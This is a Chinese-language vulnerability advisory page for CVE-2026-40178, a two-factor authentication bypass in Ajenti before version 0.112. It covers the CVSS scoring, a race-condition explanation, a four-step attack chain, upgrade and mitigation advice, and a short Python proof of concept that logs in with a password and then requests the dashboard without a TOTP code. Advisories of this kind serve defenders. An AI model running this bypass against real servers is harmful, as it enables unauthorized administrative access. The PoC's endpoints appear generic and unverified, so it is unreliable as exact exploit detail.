CVE-2026-40178 CVSS 5.9 中危

CVE-2026-40178 Ajenti 2FA认证绕过漏洞

披露日期: 2026-04-10

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-40178

漏洞类型

认证绕过

CVSS评分

5.9 中危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

Ajenti

漏洞概述

Ajenti的ajenti.plugin.core组件在0.112版本之前存在安全漏洞。当双因素认证（2FA）被激活时，在用户认证后的短暂时间内，攻击者可能绕过2FA验证。该漏洞允许未经授权的访问，影响系统的完整性。

技术细节

该漏洞源于Ajenti在处理双因素认证（2FA）时的逻辑缺陷或竞态条件。在用户成功完成第一层身份验证（如输入密码）之后，系统尚未完全强制执行第二层验证（如输入TOTP码）之前，存在一个短暂的时间窗口。攻击者利用这个窗口，可以在未提供第二重验证凭证的情况下获取有效的会话状态。由于CVSS向量显示攻击复杂度为高（AC:H），攻击者可能需要精确把握时机或利用特定请求序列。一旦成功绕过，攻击者可获得高完整性（I:H）的操作权限，可能导致未授权的配置修改或管理操作。

攻击链分析

STEP 1

侦察阶段

攻击者识别出目标系统运行的是Ajenti，且版本低于0.112，并确认启用了2FA功能。

STEP 2

利用阶段

攻击者向登录接口发送包含有效用户名和密码的请求，初始化认证流程。

STEP 3

竞态条件攻击

在服务器返回第一重认证成功但尚未强制要求第二重验证的极短时间窗口内，攻击者立即利用会话Cookie请求受保护的资源。

STEP 4

达成影响

成功绕过2FA检查，攻击者以管理员身份获取会话，可进行修改配置等高完整性影响的操作。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

# Target configuration
target_url = "http://target-ajenti-server"
username = "admin"
password = "password"

# Create a session
session = requests.Session()

# Step 1: Perform initial login (First Factor)
login_payload = {
    "username": username,
    "password": password
}

# Send login request
response = session.post(f"{target_url}/api/login", json=login_payload)

# Step 2: Exploit Race Condition
# The vulnerability allows accessing the session immediately after login response
# before the 2FA check logic is finalized on the server side.
if response.status_code == 200:
    print("[+] Login initiated. Attempting to bypass 2FA...")
    
    # Step 3: Access protected endpoint using the established session
    # without providing the 2FA code
    admin_panel = session.get(f"{target_url}/view/dashboard")
    
    if admin_panel.status_code == 200 and "dashboard" in admin_panel.text:
        print("[!] 2FA Bypass successful! Access granted to dashboard.")
    else:
        print("[-] Bypass failed.")
else:
    print("[-] Initial login failed.")

影响范围

Ajenti < 0.112

防御指南

临时缓解措施

建议立即将Ajenti升级到修复版本0.112。如果暂时无法升级，应严格限制管理端口的网络访问，仅允许受信任的IP地址连接，并监控异常的登录行为或会话创建活动。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表